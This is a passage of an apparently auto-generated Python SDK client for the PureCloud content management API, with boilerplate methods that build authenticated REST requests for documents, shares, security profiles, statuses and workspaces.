select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_document(self, document_id, **kwargs):
"""
Get a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_document(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_document_audits(self, document_id, **kwargs):
"""
Get a list of audits for a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_document_audits(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param int page_size: Page size
:param int page_number: Page number
:param str transaction_filter: Transaction filter
:param str level: level
:param str sort_by: Sort by
:param str sort_order: Sort order
:return: DocumentAuditEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'page_size', 'page_number', 'transaction_filter', 'level', 'sort_by', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_document_audits" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document_audits`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}/audits'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'transaction_filter' in params:
query_params['transactionFilter'] = params['transaction_filter']
if 'level' in params:
query_params['level'] = params['level']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DocumentAuditEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_document_content(self, document_id, **kwargs):
"""
Download a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_document_content(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param str disposition: Request how the content will be downloaded: a file attachment or inline. Default is attachment.
:param str content_type: The requested format for the specified document. If supported, the document will be returned in that format. Example contentType=audio/wav
:return: DownloadResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'disposition', 'content_type']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_document_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `get_contentmanagement_document_content`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}/content'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'disposition' in params:
query_params['disposition'] = params['disposition']
if 'content_type' in params:
query_params['contentType'] = params['content_type']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DownloadResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_documents(self, workspace_id, **kwargs):
"""
Get a list of documents.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_documents(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str name: Name
:param list[str] expand: Which fields, if any, to expand.
:param int page_size: Page size
:param int page_number: Page number
:param str sort_by: name or dateCreated
:param str sort_order: ascending or descending
:return: DocumentEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'name', 'expand', 'page_size', 'page_number', 'sort_by', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_documents" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_documents`")
resource_path = '/api/v2/contentmanagement/documents'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workspace_id' in params:
query_params['workspaceId'] = params['workspace_id']
if 'name' in params:
query_params['name'] = params['name']
if 'expand' in params:
query_params['expand'] = params['expand']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DocumentEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_query(self, query_phrase, **kwargs):
"""
Query content
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_query(query_phrase, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str query_phrase: Phrase tokens are ANDed together over all searchable fields (required)
:param int page_size: Page size
:param int page_number: Page number
:param str sort_by: name or dateCreated
:param str sort_order: ascending or descending
:param list[str] expand: Which fields, if any, to expand.
:return: QueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query_phrase', 'page_size', 'page_number', 'sort_by', 'sort_order', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'query_phrase' is set
if ('query_phrase' not in params) or (params['query_phrase'] is None):
raise ValueError("Missing the required parameter `query_phrase` when calling `get_contentmanagement_query`")
resource_path = '/api/v2/contentmanagement/query'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'query_phrase' in params:
query_params['queryPhrase'] = params['query_phrase']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryResults',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_securityprofile(self, security_profile_id, **kwargs):
"""
Get a Security Profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_securityprofile(security_profile_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str security_profile_id: Security Profile Id (required)
:return: SecurityProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['security_profile_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_securityprofile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'security_profile_id' is set
if ('security_profile_id' not in params) or (params['security_profile_id'] is None):
raise ValueError("Missing the required parameter `security_profile_id` when calling `get_contentmanagement_securityprofile`")
resource_path = '/api/v2/contentmanagement/securityprofiles/{securityProfileId}'.replace('{format}', 'json')
path_params = {}
if 'security_profile_id' in params:
path_params['securityProfileId'] = params['security_profile_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SecurityProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_securityprofiles(self, **kwargs):
"""
Get a List of Security Profiles
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_securityprofiles(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: SecurityProfileEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_securityprofiles" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/securityprofiles'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SecurityProfileEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_share(self, share_id, **kwargs):
"""
Retrieve details about an existing share.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_share(share_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str share_id: Share ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: Share
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['share_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_share" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'share_id' is set
if ('share_id' not in params) or (params['share_id'] is None):
raise ValueError("Missing the required parameter `share_id` when calling `get_contentmanagement_share`")
resource_path = '/api/v2/contentmanagement/shares/{shareId}'.replace('{format}', 'json')
path_params = {}
if 'share_id' in params:
path_params['shareId'] = params['share_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Share',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_shared_shared_id(self, shared_id, **kwargs):
"""
Get shared documents. Securely download a shared document.
This method requires the download sharing URI obtained in the get document response (downloadSharingUri). Documents may be shared between users in the same workspace. Documents may also be shared between any user by creating a content management share.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_shared_shared_id(shared_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str shared_id: Shared ID (required)
:param bool redirect: Turn on or off redirect
:param str disposition: Request how the share content will be downloaded: attached as a file or inline. Default is attachment.
:param str content_type: The requested format for the specified document. If supported, the document will be returned in that format. Example contentType=audio/wav
:param str expand: Expand some document fields
:return: SharedResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['shared_id', 'redirect', 'disposition', 'content_type', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_shared_shared_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'shared_id' is set
if ('shared_id' not in params) or (params['shared_id'] is None):
raise ValueError("Missing the required parameter `shared_id` when calling `get_contentmanagement_shared_shared_id`")
resource_path = '/api/v2/contentmanagement/shared/{sharedId}'.replace('{format}', 'json')
path_params = {}
if 'shared_id' in params:
path_params['sharedId'] = params['shared_id']
query_params = {}
if 'redirect' in params:
query_params['redirect'] = params['redirect']
if 'disposition' in params:
query_params['disposition'] = params['disposition']
if 'content_type' in params:
query_params['contentType'] = params['content_type']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SharedResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_shares(self, **kwargs):
"""
Gets a list of shares. You must specify at least one filter (e.g. entityId).
Failing to specify a filter will return 400.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_shares(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str entity_id: Filters the shares returned to only the entity specified by the value of this parameter.
:param list[str] expand: Which fields, if any, to expand.
:param int page_size: Page size
:param int page_number: Page number
:return: ShareEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_id', 'expand', 'page_size', 'page_number']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_shares" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/shares'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'entity_id' in params:
query_params['entityId'] = params['entity_id']
if 'expand' in params:
query_params['expand'] = params['expand']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ShareEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_status(self, **kwargs):
"""
Get a list of statuses for pending operations
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_status(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:return: CommandStatusEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_status" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommandStatusEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_status_status_id(self, status_id, **kwargs):
"""
Get a status.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_status_status_id(status_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str status_id: Status ID (required)
:return: CommandStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['status_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_status_status_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'status_id' is set
if ('status_id' not in params) or (params['status_id'] is None):
raise ValueError("Missing the required parameter `status_id` when calling `get_contentmanagement_status_status_id`")
resource_path = '/api/v2/contentmanagement/status/{statusId}'.replace('{format}', 'json')
path_params = {}
if 'status_id' in params:
path_params['statusId'] = params['status_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommandStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_usage(self, **kwargs):
"""
Get usage details.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_usage(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Usage
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_usage" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/usage'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Usage',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace(self, workspace_id, **kwargs):
"""
Get a workspace.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: Workspace
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workspace',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_documents(self, workspace_id, **kwargs):
"""
Get a list of documents.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_documents(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param list[str] expand: Which fields, if any, to expand.
:param int page_size: Page size
:param int page_number: Page number
:param str sort_by: name or dateCreated
:param str sort_order: ascending or descending
:return: DocumentEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'expand', 'page_size', 'page_number', 'sort_by', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_documents" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_documents`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/documents'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DocumentEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_member(self, workspace_id, member_id, **kwargs):
"""
Get a workspace member
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_member(workspace_id, member_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str member_id: Member ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'member_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_member" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_member`")
# verify the required parameter 'member_id' is set
if ('member_id' not in params) or (params['member_id'] is None):
raise ValueError("Missing the required parameter `member_id` when calling `get_contentmanagement_workspace_member`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'member_id' in params:
path_params['memberId'] = params['member_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceMember',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_members(self, workspace_id, **kwargs):
"""
Get a list workspace members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_members(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceMemberEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'page_size', 'page_number', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
